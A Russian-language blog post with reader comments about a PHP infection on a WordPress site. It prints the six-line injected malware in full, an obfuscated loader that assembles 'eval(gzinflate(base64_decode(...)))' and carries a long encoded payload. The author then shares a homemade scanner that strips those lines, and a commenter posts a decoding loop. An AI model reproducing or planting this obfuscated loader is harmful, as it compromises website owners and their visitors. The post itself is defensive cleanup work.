Открываю я как-то свой сайт, и обращаю внимание на то, что очень долго загружается страница, кроме того некоторые картинки не отображаются…
Стал разбираться. Оказалось что во всех PHP файлах сайта дописался некий код. Занимая всего 6 строк эта зараза распространилась по всему хостингу и успела прибить несколько папок с файлами.
$md5 = "a38d0bd5fc49f80982df8aef5946e33c";
$wp_salt = array("t","s",'r',"d",')','$','c','o','6','z',"g","v","_",'i','a','e','n','4',"(",'b',";",'l',"f");
$wp_add_filter = create_function('$'.'v',$wp_salt[15].$wp_salt[11].$wp_salt[14].$wp_salt[21].$wp_salt[18].$wp_salt[10].$wp_salt[9].$wp_salt[13].$wp_salt[16].$wp_salt[22].$wp_salt[21].$wp_salt[14].$wp_salt[0].$wp_salt[15].$wp_salt[18].$wp_salt[19].$wp_salt[14].$wp_salt[1].$wp_salt[15].$wp_salt[8].$wp_salt[17].$wp_salt[12].$wp_salt[3].$wp_salt[15].$wp_salt[6].$wp_salt[7].$wp_salt[3].$wp_salt[15].$wp_salt[18].$wp_salt[5].$wp_salt[11].$wp_salt[4].$wp_salt[4].$wp_salt[4].$wp_salt[20]);
$wp_add_filter('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');
Перелопатив интернет и осознав, что антивирус я не найду — сделал свой.
Все вычистил. Система работает стабильно.
Берите, кому нужен. (Под кодом есть ссылка на скачивание)
// сохраняет в файл массив
function save_array_dump($filename, $array) {
$dump = '';
foreach ($array AS $dumpa) {
$dump .= $dumpa;
}
$fp = fopen($filename, "wb+");
fwrite($fp, $dump);
fclose($fp);
}
// Сканирование директории
function scan_dir($dirname)
{
$dir = opendir($dirname);
while (($file = readdir($dir)) !== false)
{
if($file != "." && $file != "..")
{
if(is_file($dirname."/".$file))
{
$ext = explode('.',$file);
$exts = count($ext)-1;
// реагируем только на РНР файлы
if ($ext[$exts] == 'php') {
$cont = file($dirname."/".$file);
// берем значение 4-й строк (со второй по пятую) первый символ намеренно игнорируем.
$md5_string1 = $cont[1];
$md5_string2 = $cont[2];
$md5_string3 = $cont[3];
$md5_string4 = $cont[4];
$a1 = $md5_string1[1].$md5_string1[2].$md5_string1[3].$md5_string1[4].$md5_string1[5];
$a2 = $md5_string2[1].$md5_string2[2].$md5_string2[3].$md5_string2[4].$md5_string2[5];
$a3 = $md5_string3[1].$md5_string3[2].$md5_string3[3].$md5_string3[4].$md5_string3[5];
$a4 = $md5_string4[1].$md5_string4[2].$md5_string4[3].$md5_string4[4].$md5_string4[5];
// строки для детектирования
$s1 = 'md5 =';
$s2 = 'wp_sa';
$s3 = 'wp_ad';
$s4 = 'wp_ad';
// сравнение
if (($a1 == $s1)
AND ($a2 == $s2)
AND ($a3 == $s3)
AND ($a4 == $s4))
{
// если таки нашли вирус
echo "
ОБНАРУЖЕН ВИРУС В ФАЙЛЕ: ".$dirname."/".$file;
//удаляем из файла (массива) первые 6 строк (элементов)
unset($cont[0]);
unset($cont[1]);
unset($cont[2]);
unset($cont[3]);
unset($cont[4]);
unset($cont[5]);
// сохраняем
save_array_dump($dirname."/".$file, $cont);
}
}
}
// если это папка - рекурсиво заходим и туда ... повторяем в ней упражнение
if(is_dir($dirname."/".$file))
{
scan_dir($dirname."/".$file);
}
}
}
closedir($dir);
}
// Изменить на Ваш путь к папке содержащей контент сайта(ов). пример: scan_dir('/home/');
scan_dir('./');
Download: antivir-php-remover.zip
Метод действия: Проходит рекурсивно по всем PHP файлам и где находит зверя — убивает его.
Спасибо! С помощью вашего антивируса полечил свой блог. В коде на 17 строке устранил очепятку. Стало так: if($file != «.&&» && $file != «..»)
Опечатка связанна с особенностью вывода кода… (Добавил файл на скачивание)
Привет) нужна помощь как вычислить вредоносную ссылку и код,и куда установить Вашу програмку пошагово)
записать в папку public_html и из командной строки Linux выполнить php.exe [имя файла в который сохранили код]
Я чайник в таких вопросах, у меня вордпресс 3.3 , можно расписать по пунктам куда заходить и что делать? что-то я туплю в этих вопросах(
Внизу странички добавил файл
1) Скачиваешь файл
2) Распаковываешь этот файл в корень сайта, туда где папки wp-content / wp-admin
3) Зайди по ссылке: http://[твой сайт]/antivir.php
4) Жди 🙂
Большое спасибо! Скрипт отлично работает, почистил Джумлу от этой дряни.
то ли лыжи не едут, то ли я е*****ый
вот я написал развертку:
$i = 1;
while (true) {
if (preg_match(«/^eval\(gzinflate\(base64_decode\(‘(.*)’\)\)\);$/», $str, $m)) {
$str = gzinflate(base64_decode($m[1]));
} else {
echo «Проехали: $i раз..»,
«\n——————————————————\n»,
«result: » , $str,
«\n——————————————————\n»;
break;
}
$i++;
}
вот результат:
Проехали: 59 раз..
——————————————————
result: Features and
——————————————————
я выводил и проверял результат каждой итерации — ошибок нет
Вариантов несколько:
1) я му**к и не смог расшифровать.
2) тут на сайте выложен не оригинальный код вируса.
3) это не сам вирус, а тупая обманка чтобы простачки удаляли обманки, но не нашли матку.
там в аттаче есть файл….
Я не про код «антивируса», я про код «вируса».
А в аттаче только «антивирус».
Я написал в этом комментарии свое реальное мыло.
Если можно, будем на «ты».
Давай спишемся на мыло, а там в аську или скайп.
Ато мне тут дали ссылку на эту страницу, мол, вот такой у нас в ВП вирь (был, и руками его там удалили).
Ну я долго не думая решил его расшифровать, и вот вышло, что ничего не вышло…
Давай конечно… стучи в скайп dr.rest
Чет запустил этот антивирус на вордпрессе и открылась лишь белая страничка ( не хорошо
А вообще употер все файлы темы вручную, удалил отовсюду этот код, но вирус все продолжает заливать на хостинг html файлы. Видать просто удалить код с пхп файлов — не выход, где-то сидит сама мамка
Запусти скрипт из SHELL из под рута!!!
У меня подобное, только в .js . Отсюда вопросик, можно ли применить данный антивирь к ява скриптам. Т.е. вместо // реагируем только на РНР файлы
if ($ext[$exts] == ‘php’) {, прописать
if ($ext[$exts] == ‘js’) {/
Спасибо
Вы можете использовать данный скрипт по своему усмотрению. Ведь наша цель искоренение этой заразы …
Можете его дописать и разместить ссылку на Ваш вариант скрипта. все Вам скажут Спасибо
Здравствуйте, Игорь! Очень прошу вас выйти на связь со мной. На сайт goomla влез вредоносный код, найти никак не удается, т.к не разбираюсь в кодах хтмл, а удалить лишнее боюсь. Вот что у меня получилось после вот этих процедур:
— on 29/12/2011 на 12:25 said:
Внизу странички добавил файл
1) Скачиваешь файл
2) Распаковываешь этот файл в корень сайта, туда где папки wp-content / wp-admin
3) Зайди по ссылке: http://[твой сайт]/antivir.php
4) Жди
Итог получился такой : —
Warning: opendir(/home/nnpctoplus.ru/public_html) [function.opendir]: failed to open dir: No such file or directory in /home/a/arsent/nnpctoplus.ru/public_html/antivir.php on line 19
Warning: readdir(): supplied argument is not a valid Directory resource in /home/a/arsent/nnpctoplus.ru/public_html/antivir.php on line 20
Warning: closedir(): supplied argument is not a valid Directory resource in /home/a/arsent/nnpctoplus.ru/public_html/antivir.php on line 80
Может стоит попробовать из консоли ? Через SSH.
Если предоставите логин пароль и IP могу попробовать помочь ..
На сайте обнаружена вредоносная ссылка помогите убрать.
Это конечно очень подробно.
Излагайте в понятном виде Вашу проблему. Ссылку хоть покажите …
На сайте: http://ohotnik.ucoz.ru/ Касперский пишит Загрузка объекта, содержащего вредоносную ссылку js.php?i=3787&r=6145&p=9996&c=8 Запрещено: http://wap-tds.in/code/js.php?i=3787&r=6145&p=9996&c=8 (проверка по базе вредоносных веб-адресов) 23.10.2012 14:39:05 Помогите с этим разобраться.
Вячеслав. Давно пора отказаться от сервиса UCOZ. Если не знаете как — спросите меня 🙂
Подскажите пожалуйста куда именно в joomla 2.5 вставить этот файл если можно более подробно и надо ли менять в самом скаченном файле что та
Размещаем файл в корень сайта или в корень хостинга 🙂